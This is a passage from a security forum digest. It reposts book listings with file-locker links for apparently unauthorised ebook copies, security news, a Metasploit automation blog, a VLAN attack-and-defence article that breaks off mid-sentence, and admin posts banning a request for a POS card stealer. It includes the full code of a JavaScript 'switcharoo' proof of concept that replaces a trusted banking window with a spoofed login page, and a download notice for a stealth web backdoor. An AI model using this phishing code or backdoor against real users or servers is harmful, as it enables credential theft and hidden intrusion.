Nytro

[h=2]Mastering Algorithms with C[/h] [h=3]Book Description[/h] There are many books on data structures and algorithms, including some with useful libraries of C functions. Mastering Algorithms with C offers you a unique combination of theoretical background and working code. With robust solutions for everyday programming tasks, this book avoids the abstract style of most classic data structures and algorithms texts, but still provides all of the information you need to understand the purpose and use of common programming techniques. Implementations, as well as interesting, real-world examples of each data structure and algorithm, are included. Using both a programming style and a writing style that are exceptionally clean, Kyle Loudon shows you how to use such essential data structures as lists, stacks, queues, sets, trees, heaps, priority queues, and graphs. He explains how to use algorithms for sorting, searching, numerical analysis, data compression, data encryption, common graph problems, and computational geometry. And he describes the relative efficiency of all implementations. The compression and encryption chapters not only give you working code for reasonably efficient solutions, they offer explanations of concepts in an approachable manner for people who never have had the time or expertise to study them in depth. Anyone with a basic understanding of the C language can use this book. In order to provide maintainable and extendible code, an extra level of abstraction (such as pointers to functions) is used in examples where appropriate. Understanding that these techniques may be unfamiliar to some programmers, Loudon explains them clearly in the introductory chapters. Contents include: Pointers Recursion Analysis of algorithms Data structures (lists, stacks, queues, sets, hash tables, trees, heaps, priority queues, graphs) Sorting and searching Numerical methods Data compression Data encryption Graph algorithms Geometric algorithms Table of Contents Part I: Preliminaries Chapter 1 Introduction Chapter 2 Pointer Manipulation Chapter 3 Recursion Chapter 4 Analysis of Algorithms Part II: Data Structures Chapter 5 Linked Lists Chapter 6 Stacks and Queues Chapter 7 Sets Chapter 8 Hash Tables Chapter 9 Trees Chapter 10 Heaps and Priority Queues Chapter 11 Graphs Part III: Algorithms Chapter 12 Sorting and Searching Chapter 13 Numerical Methods Chapter 14 Data Compression Chapter 15 Data Encryption Chapter 16 Graph Algorithms Chapter 17 Geometric Algorithms [h=3]Book Details[/h] Paperback: 560 pages Publisher: O’Reilly Media (August 1999) Language: English ISBN-10: 1565924533 ISBN-13: 978-1565924536 File Size: 6.3 MiB [h=3]E-Book[/h] [FilePost] Oreilly.Mastering.Algorithms.with.C.Aug.1999.rar [FileJungle] Oreilly.Mastering.Algorithms.with.C.Aug.1999.rar [h=3]Paper Book[/h] [Amazon] Mastering Algorithms with C Sursa: Mastering Algorithms with C | Wow! eBook - Blog

[h=2]Pro HTML5 and CSS3 Design Patterns[/h] [h=3]Book Description[/h] Pro HTML5 and CSS3 Design Patterns is a reference book and a cookbook on how to style web pages using CSS3 and HTML5. It contains 350 ready–to–use patterns (CSS3 and HTML5 code snippets) that you can copy and paste into your code. Each pattern can be combined with other patterns to create an unlimited number of solutions, and each pattern works reliably in all major browsers without the need for browser hacks. The book is completely up-to-date with code, best practices, and browser compatibilities for HTML5 and CSS3—enabling you to dive in and make use of these new technologies in production environments. Pro HTML5 and CSS3 Design Patterns is so much more than just a cookbook, though! It systematically covers every usable feature of CSS3 and combines these features with HTML5 to create reusable patterns. Each pattern has an intuitive name to make it easy to find, remember, and refer to. Accessibility and best practices are carefully engineered into each design pattern, example, and source code. The book’s layout, with a pattern’s example on the left page and its explanation on the right, makes it easy to find a pattern and study it without having to flip between pages. The book is also readable from cover to cover, with topics building carefully upon previous topics. Pro HTML5 and CSS3 Design Patterns book unleashes your productivity and creativity in web design and development. Instead of hacking your way toward a solution, you’ll learn how to predictably create successful designs every time by reusing and combining modular design patterns. What you’ll learn Code CSS3 and HTML5 Use CSS3 Selectors Use six CSS3 Box Models Create rounded corners, shadows, gradients, sprites, and transparency Replace text with images without affecting accessibility Style text with fonts, highlights, decorations, and shadows Create flexible, fluid layouts Position elements with absolute pixel precision Stack elements in layers Size, stretch, shrinkwrap, indent, align, and offset elements Style tables with borders and alternating striped rows Size table columns automatically Integrate CSS3 and JavaScript without embedding JavaScript in HTML5 Create drop caps, callouts, quotes, and alerts Who this book is for A software developer can use this book to learn CSS3 for the first time. A designer familiar with CSS3 can use this book to master CSS3 and HTML5. If you are completely new to coding or completely new to CSS3 and HTML5, you may want to read an introductory book on CSS3 and HTML5 first. Table of Contents Design Patterns: Making CSS 3 Easy! HTML Design Patterns CSS Selectors and Inheritance Box Models Box Model Extents Box Model Properties Positioning Models Positioning: Indented, Offset, and Aligned Positioning: Advanced Styling Text Spacing Content Aligning Content Blocks Images Tables Table Column Layouts Layouts Dropcaps Callouts and Quotes Alerts [h=3]Book Details[/h] Paperback: 532 pages Publisher: Apress (November 2011) Language: English ISBN-10: 1430237805 ISBN-13: 978-1430237808 File Size: 42.6 MiB [h=3]E-Book[/h] [FilePost] Apress.Pro.HTML5.and.CSS3.Design.Patterns.Nov.2011.rar [FileJungle] Apress.Pro.HTML5.and.CSS3.Design.Patterns.Nov.2011.rar [h=3]Paper Book[/h] [Amazon] Pro HTML5 and CSS3 Design Patterns Sursa: Pro HTML5 and CSS3 Design Patterns | Wow! eBook - Blog

WeBaCoo (Web Backdoor Cookie) 0.1.2 Authored by Anestis Bechtsoudis | Site github.com Posted Dec 9, 2011 WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute system commands to the compromised server. The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses. Download: http://packetstormsecurity.org/files/download/107700/webacoo-0.1.2.tar.gz Sursa: WeBaCoo (Web Backdoor Cookie) 0.1.2 ? Packet Storm

[h=2]Free Tool Provides Point and Click SQL Injection Vulnerability Scanning[/h]By Steve Ragan on December 10, 2011 NT OBJECTives, an application security vendor based in Irvine, California, has released a new tool that not only scans for SQL Injection vulnerabilities, but also exploits them with just a few extra clicks. The tool, NTO SQL Invader, works as a stand-alone tool, but when used in combination with NT OBJECTives’ other products can take advantage of additional reporting abilities. While not the only SQL Injection scanner / exploitation tool available, the interface is clean and easy to follow, which can offer IT teams and security auditors the ability to not only say there is a problem, but show solid proof as well. "Accurate vulnerability identification is a crucial and challenging task but it is only half the battle,” says Dan Kuykendall, co-CEO and CTO of NT OBJECTives. “We wanted to support organizations in their analysis and remediation efforts by providing an easy to use tool that enables penetration testers to demonstrate how these vulnerabilities can be exploited. We felt it was important to provide a free and useful tool to our customers and to the entire community.” While we can hype the tool and its ease of use all day long, it’s better to see for yourself. NT OBJECTives has a quick three minute demo video showing the basics of the tool, which for most testers and security analysts highlights everything needed to get up and running. Sursa: Free Tool Provides Point and Click SQL Injection Vulnerability Scanning | SecurityWeek.Com NTO SQL Invader: http://rstcenter.com/forum/44578-nto-sql-invader.rst Haideti script-kidies, "la treaba"...

Enforcing Permanent DEP Filed under: Shellcode — Didier Stevens @ 21:12 Here’s a video of an exercise in my White Hat Shellcode Workshop I gave at Brucon in September. Sursa: White Hat Shellcode Workshop: Enforcing Permanent DEP

[h=1]5 Hottest Security Jobs in 2012[/h] Security Analyst, Architect Head Top Career Opportunities December 9, 2011 - Upasana Gupta, Contributing Editor, CareersInfoSecurity Information security is one of those rare fields - it has more job openings than people to fill them. Dice.com, the largest IT job site, confirms this job growth and indicates a 79 percent increase in the total number of information security jobs posted on the site from September 2009 to September 2011. Based on a review of job postings, here are the five hottest jobs for information security pros in 2012: [h=3]Security Analyst[/h] Employers have posted 42 percent more security analyst jobs on Dice in September 2011 than in 2010. This is no surprise, especially when employment among information security analysts soared by 16 percent this year during the second quarter, with the Bureau of Labor reporting no unemployment during the first two quarters of 2011. (see Infosec Joblessness Remains Steady, at 0%). John Reed, executive director at Robert Half Technology, an IT staffing firm, attributes the high growth to organizations becoming more security aware in light of cyber crimes, and needing hands-on IT security folks to uncover new vulnerabilities in order to keep their environment secure. "These are individuals on the front lines of security, fighting the fight everyday, and as such are critical for organizations to have," he says. BLS defines information security analysts as those who plan, implement, upgrade or monitor security measures for the protection of computer networks and information. Information security analysts may ensure appropriate security controls are in place that will safeguard digital files and vital electronic infrastructure, as well as respond to computer security breaches and viruses. Average Salary: $84,000 for a security analyst position. Who's Hiring: Demand is high with federal government, state agencies, defense contractors and healthcare organizations. [h=3]Security Architect[/h] Forty percent more jobs are posted on Dice this year. The move to mobile, wireless and cloud services by organizations has created a huge demand for this position, says Mano Paul, (ISC)2 software assurance adviser. These services are pushing the need for a "new breed of architects and business- savvy leaders who understand business requirements, and can translate them into functional specifications without compromising on the assurance aspects," he says. Dice.com defines a security architect as a professional who designs systems, databases, infrastructure and networks to be secure. They provide information security solutions to the architecture of an enterprise ensuring the security of business information at every point. Average Salary: $120,000 for a security architect position. Who's Hiring: Large financial institutions, healthcare organizations, technology companies and cloud providers. [h=3]Application Security[/h] Thirty-three percent more jobs are posted on Dice in application security this year. The increased focus on customer-facing technologies, use of mobile applications, need for secure software and products within organizations and transitions to electronic health records have led to the demand for these jobs. "High incidences of application attacks, data breaches and applications that are conduits to the data, combined with surge in tech businesses, is pushing growth for qualified professionals," Paul says. The Open Web Application Security Project, a not-for-profit organization focused on improving the security of application software, defines application security professionals as those that use software and security methods to protect applications from external threats and vulnerabilities. They are largely involved in building security measures into an application's life cycle including design, development, deployment, upgrade or maintenance. Average Salary: $93,000 for an application security position. Who's Hiring: Online companies, technology firms, cloud providers and security vendors. [h=3]Security Engineer[/h] Employers have posted 27 percent more security engineer jobs on Dice this year. This field is hot because the role is broad and covers areas from penetration testing, vulnerability assessments, programming, designing systems to testing software. "It's not like a painting on the wall that you hang up and it's done. Organizations need constant assessment of their risk and vulnerabilities, and therefore require such breadth of expertise," Reed says. BLS defines security engineers as those who securely design, develop, test and evaluate computer applications and system software. Although programmers write and support programs in new languages, much of the design, security and development are the responsibility of security engineers. They also focus in developing algorithms, and analyzing and solving programming problems for specific network systems. Average Salary: $94,000 for a security engineer position. Who's Hiring: This position is in demand in all sectors, including government, healthcare, finance, in addition to online and technology companies. [h=3]Network Security[/h] Twenty-five percent more jobs are posted on Dice within network security this year. Of the 100 jobs that make Money magazine's and Payscale.com's list, network security was ranked number eight last year as one of the most desirable job positions, carrying an annualized 10-year forecast growth of 27 percent. "Network security continues to be a pain point for companies," says Alice Hill, managing director of Dice.com. She finds that organizations continue to prioritize investing in these professionals to protect critical infrastructure and keep their technology platforms safe from ongoing cyber threats like malware and hacking. Further, she says that the growing use of sophisticated computer networks, including Internet and intranet sites, and the need for faster, more efficient networking products, are increasing the demand for these professionals. BLS defines network security as those who design and evaluate network systems, such as local area networks, wide area networks and Internet systems. They perform network modeling, analysis, and planning, that deals with the interfacing of computer and communications equipment. Their primary focus is in protecting the computer systems in the network from unwanted intrusions, misuse, access or modifications. Average Salary: $93,000 for a network security engineer position. Who's Hiring: An increased demand is coming from government agencies, healthcare organizations, consulting companies and defense contractors. Editors Note: Salaries cited in the story came from salary tracking websites Indeed.com and Payscale.com. Sursa: 5 Hottest Security Jobs

Browser Security Comparison A Quantitative Approach Document Profile Version 0.0 Published 12/6/2011 Contents Authors ......................................................................................................................................................... v Executive Summary ...................................................................................................................................... 1 Methodology Delta .................................................................................................................................. 1 Results ...................................................................................................................................................... 2 Conclusion ................................................................................................................................................ 2 Introduction ................................................................................................................................................. 3 Analysis Targets ....................................................................................................................................... 4 Analysis Environment............................................................................................................................... 4 Analysis Goals .......................................................................................................................................... 4 Browser Architecture ................................................................................................................................... 5 Google Chrome ........................................................................................................................................ 5 Internet Explorer ...................................................................................................................................... 5 Mozilla Firefox .......................................................................................................................................... 6 Summary .................................................................................................................................................. 6 Browser Comparison ................................................................................................................................ 8 Historical Vulnerability Statistics .................................................................................................................. 8 Browser Comparison ................................................................................................................................ 8 Issues with Counting Vulnerabilities ......................................................................................................... 9 Issues Surrounding Timeline Data .......................................................................................................... 10 Issues Surrounding Severity .................................................................................................................... 11 Issues Unique to Particular Vendors ....................................................................................................... 11 Data Gathering Methodology ................................................................................................................. 13 Update Frequencies ............................................................................................................................... 13 Publicly Known Vulnerabilities ................................................................................................................ 16 Vulnerabilities by Severity ...................................................................................................................... 17 Time to Patch ......................................................................................................................................... 18 URL Blacklist Services ................................................................................................................................. 20 Comparing Blacklists ............................................................................................................................... 20 “Antivirus-via-HTTP” ............................................................................................................................... 20 Multi-Browser Defense ........................................................................................................................... 20 Comparing Blacklist Services ................................................................................................................... 21 Comparison Methodology ...................................................................................................................... 21 Results Analysis ...................................................................................................................................... 21 Conclusions ............................................................................................................................................ 25 Anti-exploitation Technologies ................................................................................................................... 26 Address Space Layout Randomization (ASLR) ......................................................................................... 26 Data Execution Prevention (DEP) ............................................................................................................ 26 Stack Cookies (/GS) ................................................................................................................................ 26 SafeSEH/SEHOP ...................................................................................................................................... 26 Sandboxing ............................................................................................................................................. 27 JIT Hardening ......................................................................................................................................... 28 Browser Anti-Exploitation Analysis ............................................................................................................. 31 Browser Comparison ............................................................................................................................... 32 Google Chrome ...................................................................................................................................... 34 Microsoft Internet Explorer .................................................................................................................... 45 Mozilla Firefox ........................................................................................................................................ 58 Browser Add-Ons ....................................................................................................................................... 67 Browser Comparison ............................................................................................................................... 68 Google Chrome ...................................................................................................................................... 69 Internet Explorer .................................................................................................................................... 80 Firefox .................................................................................................................................................... 89 Add-on summary ................................................................................................................................... 97 Conclusions ................................................................................................................................................ 98 Bibliography ............................................................................................................................................. 100 Appendix A – Chrome Frame ......................................................................................................................... I Overview ................................................................................................................................................... I Decomposition ......................................................................................................................................... II Security Implications ............................................................................................................................... III Risk Mitigation Strategies ......................................................................................................................... V Conclusion ................................................................................................................................................ V Bibliography ............................................................................................................................................ VI Appendix B .................................................................................................................................................... I Google Chrome ......................................................................................................................................... I Internet Explorer ................................................................................................................................... XIII Mozilla Firefox ..................................................................................................................................... XVIII Tools .............................................................................................................................................................. I Authors Listed in alphabetical order: - Joshua Drake (jdrake@accuvant.com) - Paul Mehta (pmehta@accuvant.com) - Charlie Miller (charlie.miller@accuvant.com) - Shawn Moyer (smoyer@accuvant.com) - Ryan Smith (rsmith@accuvant.com) - Chris Valasek (cvalasek@accuvant.com) Pages: 140 Download: http://www.accuvant.com/sites/default/files/AccuvantBrowserSecCompar_FINAL.pdf

Bun, sa lamurim situatia: "Stiu pe cineva care are ceva de genul... POS stealer. Este un virus mic, care se instaleaza in terminalele POS si, tot ce trece prin terminal salveaza... ori in mail ori urca pe un ftp. Daca stie cineva ceva, rog PM." Eu din acest post inteleg ca esti interesat de un POS stealer, ceea ce nu e tocmai ceva etic si regulile forumului interzic astfel de rahaturi aici, vrem ca oamenii de aici sa fie oameni pasionati de securitate IT, programare, NU de furturi, carding si alte rahaturi. Nu vreau sa se stranga aici tot felul de astfel de persoane dormice de furat date bancare din POS-uri. Regulile forumului sunt destul de clare in aceasta privinta. Daca ai nelamuriri in continuare si nu esti de acord cu banul, iti poti crea un alt cont si imi poti trimite un PM de pe el. Asta daca nu esti tu cel care a inceput sa injure pe la prezentare, in aceste conditii nu cred ca are rost sa te chinui. Edit: Daca vrei sa ajungi asa: http://packetstormsecurity.org/news/view/20311/Four-Romanians-Charged-With-Hacking-150-Subway-Shops.html e problema ta, noi nu vrem sa incurajam astfel de rahaturi si nu suntem de acord cu ele.

Am mai facut cateva modificari de ordin grafic. Am mai centrat putin lucrurile. O sa ma ocup si de altele azi si maine.

Ca idee, TOATE datele trec prin serverele Yahoo! Am facut un test cu un transfer de fisier si fisierul era transmis tot printr-un server Yahoo!, deci nu poti vedea IP-ul celui cu care vorbesti pe messenger.

Da, chiar nu mi-ar fi trecut prin cap sa dau Next la instalare, ma gandeam ca: "Frate, poate iau virusi daca dau Next". Acum serios, nu cred ca e nevoie de un tutorial despre cum sa instalezi si sa folosesti un client FTP. Si mai serios, incercati sa postati lucruri interesante, aici la tutoriale romana sunt o gramada de rahaturi imputite, porcarii care nu o sa ajute pe nimeni sa se ridice si sa invete mai multe. Oricum, nu e nicio problema ca ai postat, dimpotriva, poate fi foarte util multor persoane, dar cred ca majoritatea celor de aici stiu sa foloseasca un client FTP. Ar fi perfect daca ar traduce cineva niste tutoriale din engleza...

Bun, la puscarie cu ei.

Ok, daca mai gasesti astfel de probleme sa postezi. Valabil si pentru ceilalti. O sa repar ce se poate. Daca mai sunt persoane care "si-au pierdut" conturile sa procedeze la fel: username vechi si un link cu un post de pe vechiul username + alte detalii ca join date sau mai stiu eu ce.

User: LLegoLLaS User: Petzy User: BGS User: wildchild User: tromfil Am "rezolvat" problema cu conturile (pentru cei de mai sus). Datele de pe noile conturi au fost sterse. Totusi, nu garantez ca aveti toate datele de dinainte. De fapt pot sa spun ca nu garantez pentru niciun utilizator ca are toate datele de dinainte de probleme. Am actualizat si "post count" pentru toti utilizatorii forumului. Cam atat pentru aceasta seara, imi era mai usor daca nu foloseati conturile noi sa nu stau sa sterg datele existente (in afara de posturi). Maine seara si in weekend rezolv si alte probleme, mai sunt...

[h=2]Six Ways to Automate Metasploit[/h] Posted by HD Moore on Dec 8, 2011 10:44:35 AM Onward Over the last few weeks the Metasploit team at Rapid7 has engaged in an overhaul of our development process. Our primary goals were to accelerate community collaboration and better define the scopes of our open source projects. The first step was to migrate all open source development to GitHub. This has resulted in a flood of contributors and lots of great new features and content. One controversial change involved removing old, buggy automation tools that simply didn't meet the quality bar, or our scope for the framework. This resulted in the removal of file_autopwn and db_autopwn. Both of these modules were easy to use, but were more likely to fall over and crash than produce useful results. The db_autopwn code started off as a joke and never reached a point where it was actually stable. For anyone who really wants to use db_autopwn, a community contributor maintains it as a plugin in a GitHub fork. The Metasploit products (inlcuding the open source Metasploit Framework) support automation at multiple levels. How you automate the product depends on what type of task you are working on and the granularity needed. The list below is not comprehensive; there are an infinite number of ways to extend, include, and automate Metaspoit, but these are the best supported and most common methods. The Metasploit Console Resource Scripts The console (msfconsole or msfpro) supports basic automation using Resource Scripts. These scripts contain a set of console commands that are executed when the script loads. In addition to basic console commands, these scripts are also treated as ERB templates. ERB is a way to embed Ruby code directly into a document. This allows you to call APIs that are not exposed via console commands and even programmatically generate and return a list of commands based on your own logic. Resource Scripts can be specified with the -r option to the Metasploit Console and ~/.msf4/msfconsole.rc is automatically executed on startup if it exists. Resource Scripts can also be executed from the console prompt through the resource command. Plugins The console (msfconsole or msfpro) also supports the concept of Plugins. Plugins add new console commands that provide a utlity or automation function. The flexibility of the Ruby language allows Plugins to do nearly anything, from exposing new automation capabilities, to providing socket-level content filtering to prevent the tripping of a remote IDS. Direct integration with Nexpose, Nessus, and OpenVAS from the console are accomplished through plugins. The full list of default plugins can be found in the GitHub repository. Plugins are the suggested way to work on new console commands and share them with the wider community. Auxiliary Module Custom Commands Auxiliary modules are defined as any Metasploit module that performs a remote operation of some sort, but doesn't take an actual payload like an exploit. Auxiliary modules handle things like reconnaisance, authentication bypass, network sniffing, and vulnerability discovery. One little-used feature of Auxiliary modules is the ability to define new console commands from within the module context. The user would enter "use auxiliary/module/name" and if the module exposes new commands, these would become available to the console. One example is the TrendMicro ServerProtect File Access module. Custom Auxiliary Modules Although we do not accept modules that run other modules into the Metaspoit Framework proper, these are trivial to create as custom modules and allow for any form of automation, exposed through any supported user interface. The major advantage to writing automation tools as Auxiliary modules is that they will usually work just fine from Metasploit Community Edition or Metasploit Pro, as well third-party interfaces like MSFGUI. One example of an existing automation module in the framework (and one that is still being reviewed from a design perspective) is browser_autopwn. This module will automatically configure exploit modules and redirect the target to the appropriate one. The reason why this isn't really a good fit for the framework is that payload and target selection are hardcoded to values that may not always work. We are looking into better ways to handle client-side exploit automation, but until then, it serves as an in-tree example of Auxiliary module automation. Metasploit Remote API The Metasploit Framework and Metasploit Pro both support automation using a documented Remote API. On the framework side, this exposes a wide range of functionality at the lowest level, allowing the caller to run modules, interact with sessions, and generally access the backend of the Metasploit instance. Metasploit Pro builds on this by offering access to the commercial product features through the same API. In fact, the Metasploit Pro user interface uses this same API to drive the backend automation. The product was built with automation and extensibility in-mind. Using Metasploit Pro with the Remote API makes it painless to remotely automate a penetration test, across multiple instances of Pro, all from a central location. Rapid7 customers are using this today to conduct automation exploitation during off-hour scan windows and to automate things like password testing across dozens of remote sites at once, with centralized reporting. You can find examples of the Pro API automation in the documentation directory of the framework. The msfrpc-client GEM is available for Ruby developers. Ruby Programming At the end of the day, the Metasploit Framework is a development environment more than it is a standalone product. The APIs offered make it easy to embed a copy of the framework into another tool, parse the module database looking for a specific set of criteria, or even repurpose the existing network APIs to build something new. Each of the previous methods makes it easy to load custom Ruby code and leverage that code in a useful way; to get the most out of the Metasploit products, it helps to become familiar with the framework API itself. Nearly all of the framework code is available under an open source license and the latest changes can be found in the main GitHub repository. Metasploit Pro customers are encouraged to contact support (and likely, from there, the development team) about any ideas they have for development or integration. Nearly any code written for the Metasploit Framework is drop-in compatible with Metasploit Pro. Support If you have any questions about automation, the Discussion forum in the Rapid7 Community is a great way to get started. For realtime discussion, the #metasploit channel on the FreeNode IRC network (#metasploit) is a great resource as well. Sursa: https://community.rapid7.com/community/metasploit/blog/2011/12/08/six-ways-to-automate-metasploit

JavaScript Switcharoo Proof Of Concept Authored by Michal Zalewski | Site lcamtuf.coredump.cx It seems that relatively few people realize that holding a JavaScript handle to another window allows the attacker to tamper with the location and history objects at will, largely bypassing the usual SOP controls. With some minimal effort and the help of data: / javascript: URLs or precached pages, this can be leveraged to replace content in a manner that will likely escape even fairly attentive users. /* Another whimsical browser proof-of-concept: http://lcamtuf.coredump.cx/switch/ It seems that relatively few people realize that holding a JavaScript handle to another window (either because we opened it, or because the window was at some point displaying our content) allows the attacker to tamper with the location and history objects at will, largely bypassing the usual SOP controls. With some minimal effort and the help of data: / javascript: URLs or precached pages, this can be leveraged to replace content in a manner that will likely escape even fairly attentive users. /mz */ <script> /* If you don't get it, beaver.coredump.cx is a trusted banking website; everything else is attacker-controlled. We begin by opening the legitimate, trusted website. Timing is essential. Once the banking website is loaded, follow the displayed security tip. */ var spaces = " " + " " + " " + " " + " " + " " + " " + " "; var bank_html = "<title>Beaver Creek Online Banking and BBQ</title>" + "<h1>Beaver Creek Online Banking and BBQ</h1>" + "<p>" + "<font color=crimson>Security tip: please confirm that you see " + "<code>http://beaver.coredump.cx/</code> in the address bar!</font>" + "<p><table><tr>" + "<td>Login:</td><td><input type=text></td></tr><tr>" + "<td>Password:</td><td><input type=password></td></tr></table><p>" + "<input type=submit value='Log in!'>"; var w; function dostuff() { /* Precache */ if ('v' == '\v') { var x = new Image(); x.src = 'http://spoofed.coredump.cx/phish/'; } w = window.open('http://beaver.coredump.cx/beaver/', 'target'); setTimeout(dostuff2, 5000); } function dostuff2() { if ('v' == '\v') w.open('http://spoofed.coredump.cx/phish/','target'); else w.location.replace('data:text/html;np.cx/beaver/' + spaces + ',' + escape(bank_html)); } </script> <h3>The old switcharoo</h3> This is hardly new, but illustrates the effectiveness of using data: or precached content to do the deed. You're probably fooling yourself if you think you'd spot this happening to you in the wild. <p> <input type=submit onclick="dostuff()" value="Do it"> <p> <font color=gray>PS. If you don't get it, close the window and try again. If you're still stumped, view the source.</font> Sursa: JavaScript Switcharoo Proof Of Concept ? Packet Storm

Securitytube Metasploit Framework Expert Part 1 (Exploitation Basics) Description: Welcome to Part 1 of the SecurityTube Metasploit Framework Expert (SMFE) course material videos. You can sign up for the course here: SecurityTube Metasploit Framework Expert Certification In this video, we will look at the basics of vulnerability, how to use a raw one using the exploit source code and identify the problems with this approach. This will then lead to the need for a tool like Metasploit. Securitytube Metasploit Framework Expert Part 2 ( Why Metasploit? ) Description: This is Part 2 of the Security Metasploit Framework Expert (SMFE) course material. You can begin by watching Part 1 here: Securitytube Metasploit Framework Expert Part 1 (Exploitation Basics) . You can sign up for the course here: SecurityTube Metasploit Framework Expert Certification In Part 2, we will look at how to use Metasploit to exploit vulnerabilities in the Dcom and Netapi services. We will also learn how to de-couple exploits and payloads, and mix and match them. Securitytube Metasploit Framework Expert Part 3 ( Meterpreter Basics ) Description: This is Part 2 of the Security Metasploit Framework Expert (SMFE) course material. You can begin by watching Part 1 here: Securitytube Metasploit Framework Expert Part 1 (Exploitation Basics) . You can sign up for the course here: SecurityTube Metasploit Framework Expert Certification Enjoy! In this video, we will look at the basics of Meterpreter - how it uses reflective DLL injection to stay in-memory, communicates over encrypted channels, uses TLV for communication which allows for multi-channel communication and a bunch of other things. Sursa: Welcome to SecurityTube!

VLAN Hacking December 8th, 2011|By: Hari Krishnan|Topics: |1 Comment Introduction In Virtual LAN or VLAN is a group of hosts communicate with each other, even thoughthey are in different physical location. Virtual LAN provides location independence to the users, able to save the bandwidth, manage the device, cost effective for the organization are some of the facilities provided by the Virtual LAN. VLAN is based on Layer 2 “Data link” of the OSI Model. The OSI layers are independent of each other and they communicate with each other. If any one of the layer gets compromised the other layers also fail. The VLAN is on the Data Link layer, which is as vulnerable to attacks as any other layer on the OSI model. Security Issues faced by a VLAN When it comes to VLAN, it is best suited for Traffic management and definitely not for security. Some of the security issues faced by VLAN are given below. ARP Attack MAC Flooding Attack DHCP attack Spanning-Tree Protocol Attack Multicast Brute Force Attack Private VLAN Attack VLAN Hopping Attack Double-Encapsulated 802.1Q Random Frame Stress Attack ARP Attack ARP is an Address Resolution Protocol which is designed for a friendly environment. ARP works by associating IP address of Layer 3 with MAC address of Layer 2. ARP lacks very much when it comes to security, a malicious user is able to use a forged IP address of Layer 3 and MAC address of Layer 2, there is no way to verify those forged details in ARP. The malicious user identifies him as a legitimate user and starts to use resources available on the network. It’s even possible to transmit ARP packets to a device in a different VLAN using those forged details. It even allows the malicious user to perform a Man-in-the-middle ( MiM )attack. A MiM attack is performed when a network device identifies itself as another network device such as default gateway, there is no way to verify those credentials. Then the attacker starts to send the ARP packets to the targeted victim, those ARP packets cannot be verified by the receiver. The receiver ARP table is filled with the forged details of the ARP packets sent by the attacker. The attacker is then able to gather all the information about the receiver and even tries to resemble as the receiver to other devices in the network. At the end of the attack, the attacker corrects the ARP tables and the network comes back to normal. Tool which can be used for performing ARP spoofing are Arpspoof, Arpoison, Cain and Abel, and Ettercap, Trapper which was inspired from the famous tool called Cain. An effective countermeasure to ARP attacks is Dynamic ARP inspection (DAI). DAI is a security feature which validates all the ARP packets in a network. It discards the ARP packets with invalid IP and MAC address. To enable DAI on a VLAN(DHCP Environment on CISCO) Enters into the Global Configuration command Router# configure terminal Enables DAI on VLAN by using iparp inspection Vlan{vlan_id|vlan_range} from the global configuration table Router(config)# iparp inspection vlan {vlan_ID |vlan_range} Finally, Verifies the Configuration Router(config-if)# do show iparp inspection vlan {vlan_ID |vlan_range} | begin Vlan MAC Flooding Attack MAC flooding attack is one of the common attacks on a VLAN. In a MAC flooding attack, the switch is flooded with packets of different MAC address therefore consuming memory on the switch. During the MAC flooding attack, switch starts to behave like a “hub” where it starts to share the data with all the ports. Thus a malicious user is able to use a Packet sniffer to extract the sensitive data’s. For example, there are 3 workstations WA, WB and WC. When WA tries to send a data to WB it is not viewed by the WC because of switch. Now, a malicious user consider WC, starts a MAC flooding attack on switch with different MAC Address, the memory of switch is filled. Now, the switch starts to behave like a HUB, thus when next time WA tries to send a data to WB, it will be easily viewed by the WC. The best way to secure VLAN from MAC flooding attack is through Static Secure MAC address. They need to be manually configured using the command “switchport port-security mac-address mac-address interface ”.The other way to secure MAC Flooding is to limit the amount of MAC address received by the port. DHCP Attack DHCP is Dynamic host configuration protocol which enables a server to automatically assign IP address to a host with other information such as subnet mask and default gateway. There are two types of DHCP attack on VLAN; they are DHCP starvation Attack and DHCP rogue attack. In DHCP starvation attack, a malicious user sends numerous DHCP request with spoofed MAC address. This causes a Denial of Service at DHCP server, thus not allowing an authentic user from using the network. It can be avoided by limiting the number of MAC address. In DHCP rouge attack, a malicious user acts as if he is a DHCP server and provides a reliable user with Wrong gateway, Wrong DNS and Wrong IP. The user will experience numerous problems ranging from connection problem to communication problems with other host. This can be avoided by using a multilayer switch which got a capability to drop the packets. One of the tools which can be used for these kind of attack is Yersinia which is a network tool designed to take advantage of some weakness in different network protocols. This can be also used for spanning-tree protocol attack. Spanning-Tree Protocol Attack When a malicious user sends a STP message with a priority zero value thus making a new root bridge thus compromising the entire network is known as Spanning-Tree Protocol attack. It can be avoided by disabling spanning -tree function to the entire user interface. This can also be done by enabling root guard on CISCO equipment or BPDU guard on user’s port to disable Priority Zero value thus the malicious user won’t be able to gain the root bridge To enable Root Guard on CatOS vega> (enable) set spantree guard root 1/1 Rootguard on port 1/1 is enabled. Warning!! Enabling rootguard may result in a topology change. vega> (enable) To enable BPDU guard on CatOS Console> (enable) set spantreeportfastbpdu-guard enable Spantreeportfastbpdu-guard enabled on this switch. Console> (enable) Multicast Brute Force Attack The multicast brute force attack proceeds when a switch receives a number of multicast frames in rapid succession. This causes the frames to leak into other VLAN instead of containing it on original VLAN. This might also cause a scenario similar to denial of service. The multicast brute force attack can be stopped by a well-equipped switch which prevents the frames from leaking into other VLAN and therefore containing them in the original VLAN. Private VLAN Attack A Private VLAN is a feature in Layer 2 which is used to isolate the traffic only at layer2. When a layer 3,device such as a router is connected to a Private VLAN, it supposed to forward all the traffic received by the router to whatever destination it’s meant for. Sometimes a malicious user might use it for his advantage. This can be prevented by configuring the VLAN access list. To define a VLAN access map # vlan access-mapmap_name [0-65535] To delete a map sequence from VLAN access map # no vlan access-mapmap_name 0-65535 To delete the VLAN access map # no vlan access-mapmap_name VMPS/VQP Attack: This kind of attack normally happens on Dynamic VLAN Access Ports. This VMPS uses VQP protocol. The disadvantage of VMPS is that it doesn’t use authentication for assigning Vlans based on the MAC address and also it is over UDP which further makes it more vulnerable for the attack. Normally a DOS attack happens in order to join the unauthenticated VLAN. VLAN Hopping Attack VLAN hopping works by sending packets to a port which should not be accessible. Basically, in VLAN hopping attack there are two types Switch Spoofing Double Tagging Switch Spoofing Switch spoofing happens when a malicious user tries to configure a system to spoof itself as a switch by matching itself to 802.1q or ISL. The malicious user is able to spoof the switch with help of (Dynamic Trunk Protocol) DTP signaling. Double Tagging Double tagging is 